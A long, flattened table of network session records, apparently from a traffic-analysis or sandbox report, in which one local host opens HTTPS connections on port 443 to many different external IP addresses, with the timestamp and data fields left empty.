                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10655192.168.2.144644253.41.48.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10656192.168.2.1451278175.31.242.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10657192.168.2.145478479.118.47.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10658192.168.2.1438578105.174.100.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10659192.168.2.1449686162.4.29.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10660192.168.2.145415047.64.104.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10661192.168.2.1447220165.53.232.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10662192.168.2.1448368152.229.24.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10663192.168.2.1440056138.160.88.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10664192.168.2.143702017.22.156.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10665192.168.2.1454672135.141.66.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10666192.168.2.1459694144.245.248.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10667192.168.2.145765491.42.59.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10668192.168.2.143368827.56.94.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10669192.168.2.145484838.67.192.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10670192.168.2.146001893.25.147.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10671192.168.2.1457460119.216.89.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10672192.168.2.1448634210.133.254.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10673192.168.2.1443814114.8.209.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10674192.168.2.1447532126.131.8.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10675192.168.2.1452596110.88.238.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10676192.168.2.145197288.118.128.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10677192.168.2.1459980160.233.48.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10678192.168.2.144482058.207.12.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10679192.168.2.144732684.83.78.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10680192.168.2.1446032129.150.198.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10681192.168.2.1457210141.86.147.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10682192.168.2.144217077.27.34.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10683192.168.2.1458626120.165.218.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10684192.168.2.1446532115.214.8.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10685192.168.2.1436938210.142.62.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10686192.168.2.143475493.170.141.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10687192.168.2.145557241.253.145.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10688192.168.2.146086813.178.232.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10689192.168.2.143579238.98.170.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10690192.168.2.1456542170.100.220.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10691192.168.2.143284443.231.142.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10692192.168.2.1433702146.14.239.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10693192.168.2.1453152134.171.118.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10694192.168.2.1437450207.138.233.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10695192.168.2.145094425.189.180.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10696192.168.2.146024632.198.82.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10697192.168.2.1438840137.181.220.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10698192.168.2.1451346219.187.7.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10699192.168.2.1454896112.208.238.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10700192.168.2.1437038208.175.97.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10701192.168.2.1452220183.255.48.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10702192.168.2.144911625.104.118.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10703192.168.2.144571898.155.148.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10704192.168.2.1460872186.92.154.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10705192.168.2.143776860.131.106.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10706192.168.2.1433454141.249.97.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10707192.168.2.1459624140.150.111.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10708192.168.2.1440954152.220.0.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10709192.168.2.145909617.5.91.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10710192.168.2.144773050.152.179.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10711192.168.2.1446488170.15.141.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10712192.168.2.144591843.117.158.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10713192.168.2.1460588131.240.9.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10714192.168.2.144245032.54.108.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10715192.168.2.1440586140.255.90.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10716192.168.2.145983677.108.200.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10717192.168.2.1441180205.145.198.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10718192.168.2.144402612.81.153.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10719192.168.2.144798861.157.167.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10720192.168.2.144193665.118.68.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10721192.168.2.14332545.206.95.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10722192.168.2.1448442139.104.184.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10723192.168.2.143981272.73.30.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10724192.168.2.1436074180.85.90.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10725192.168.2.1449122170.66.247.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10726192.168.2.144910435.92.66.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10727192.168.2.144241453.212.35.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10728192.168.2.14476382.167.31.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10729192.168.2.1445452194.166.255.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10730192.168.2.145577061.180.119.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10731192.168.2.145287096.110.246.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10732192.168.2.1445832200.177.149.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10733192.168.2.1435608156.221.243.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10734192.168.2.145087052.239.40.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10735192.168.2.1436086187.46.16.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10736192.168.2.144036452.103.103.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10737192.168.2.1452926130.132.20.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10738192.168.2.145001652.210.101.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10739192.168.2.1441570156.126.113.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10740192.168.2.144177876.195.243.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10741192.168.2.145453619.225.213.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10742192.168.2.1434642218.1.80.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10743192.168.2.145264893.244.254.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10744192.168.2.145273280.23.156.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10745192.168.2.1435960159.29.220.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10746192.168.2.1436264118.126.54.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10747192.168.2.145487878.133.111.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10748192.168.2.145663631.22.240.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10749192.168.2.14492664.231.71.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10750192.168.2.1454038193.238.145.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10751192.168.2.1441386217.100.160.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10752192.168.2.144395273.155.249.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10753192.168.2.1445288113.204.160.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10754192.168.2.1443632174.194.88.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10755192.168.2.1440832123.184.126.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10756192.168.2.1456874210.26.248.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10757192.168.2.1443870129.186.105.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10758192.168.2.1444220133.235.252.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10759192.168.2.1442992129.6.219.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10760192.168.2.145834091.31.172.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10761192.168.2.145439898.64.161.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10762192.168.2.145304883.114.174.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10763192.168.2.144555651.249.61.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10764192.168.2.1443022103.74.3.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10765192.168.2.1456442159.161.194.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10766192.168.2.1442156182.147.71.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10767192.168.2.1460934172.55.65.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10768192.168.2.1435618128.207.232.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10769192.168.2.143933896.244.66.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10770192.168.2.1443902173.88.195.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10771192.168.2.1444750126.9.236.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10772192.168.2.1441286135.70.115.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10773192.168.2.1437400160.0.156.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10774192.168.2.1450580173.109.37.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10775192.168.2.1433798199.84.127.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10776192.168.2.1450916201.159.148.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10777192.168.2.146017470.204.85.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10778192.168.2.1450024188.8.16.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10779192.168.2.143744650.13.79.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10780192.168.2.1449678123.228.45.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10781192.168.2.144590469.56.33.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10782192.168.2.1448174139.228.132.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10783192.168.2.1437480164.200.162.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10784192.168.2.1446118154.110.199.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10785192.168.2.1458212172.167.93.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10786192.168.2.1444756167.251.246.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10787192.168.2.1437666131.80.201.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10788192.168.2.1447912213.254.241.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10789192.168.2.143811473.185.53.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10790192.168.2.143581831.64.116.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10791192.168.2.145684875.162.23.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10792192.168.2.1447738183.23.91.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10793192.168.2.1457836106.12.142.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10794192.168.2.146021669.20.136.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10795192.168.2.1435380153.103.2.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10796192.168.2.1433656146.166.154.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10797192.168.2.1450784141.201.43.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10798192.168.2.1455672204.206.91.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10799192.168.2.145758287.53.22.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10800192.168.2.145516070.83.81.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10801192.168.2.1457444159.155.71.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10802192.168.2.1458060129.138.212.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10803192.168.2.145184043.198.246.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10804192.168.2.145084275.57.80.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10805192.168.2.1444660167.254.207.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10806192.168.2.14346485.160.15.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10807192.168.2.1444550149.140.246.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10808192.168.2.1460948209.237.173.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10809192.168.2.143471092.91.208.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10810192.168.2.145099044.218.33.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10811192.168.2.1436290142.108.59.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10812192.168.2.145380091.31.212.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10813192.168.2.1438150157.33.12.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10814192.168.2.1442510171.107.52.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10815192.168.2.1453418212.2.102.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10816192.168.2.1433664185.4.26.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10817192.168.2.143300450.133.124.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10818192.168.2.1438514101.182.168.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10819192.168.2.14578584.8.189.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10820192.168.2.1453374167.190.116.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10821192.168.2.144694613.227.159.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10822192.168.2.145400673.33.83.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10823192.168.2.144608046.242.254.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10824192.168.2.1433644182.72.130.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10825192.168.2.1449496179.211.47.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10826192.168.2.1454290140.85.153.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10827192.168.2.144370252.156.207.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10828192.168.2.1433714194.112.242.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10829192.168.2.144157894.17.114.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10830192.168.2.144705473.94.56.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10831192.168.2.145448840.19.77.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10832192.168.2.1443954160.189.207.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10833192.168.2.1459722212.36.100.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10834192.168.2.1438774109.60.183.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10835192.168.2.1437424139.206.118.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10836192.168.2.143507025.127.78.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10837192.168.2.1443178181.207.69.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10838192.168.2.1458464145.226.53.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10839192.168.2.1437594194.60.3.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10840192.168.2.145496068.45.116.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10841192.168.2.1443920148.85.127.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10842192.168.2.1453398181.249.76.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10843192.168.2.1455962153.155.187.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10844192.168.2.144829078.166.86.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10845192.168.2.1456488178.201.239.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10846192.168.2.14432325.64.175.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10847192.168.2.1440810212.214.61.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10848192.168.2.1456910219.174.29.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10849192.168.2.1459890155.213.88.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10850192.168.2.1438674195.121.131.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10851192.168.2.1437988206.175.179.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10852192.168.2.144224676.178.79.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10853192.168.2.1454182151.119.37.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10854192.168.2.1444542139.203.122.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10855192.168.2.144898020.237.239.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10856192.168.2.1438670104.20.61.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10857192.168.2.1440360172.156.186.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10858192.168.2.1450382141.226.89.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10859192.168.2.143885473.22.146.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10860192.168.2.144440492.76.142.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10861192.168.2.1439316221.206.101.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10862192.168.2.1460724103.59.2.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10863192.168.2.1451922169.4.80.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10864192.168.2.1439340117.93.253.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10865192.168.2.144621250.130.57.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10866192.168.2.144704094.250.58.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10867192.168.2.144679890.75.125.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10868192.168.2.1447848171.147.12.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10869192.168.2.144614852.87.179.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10870192.168.2.1453464178.217.185.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10871192.168.2.1450800110.18.56.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10872192.168.2.1445274220.18.187.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10873192.168.2.145973831.142.161.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10874192.168.2.1435072160.210.87.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10875192.168.2.144994074.131.247.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10876192.168.2.144048891.138.252.210443
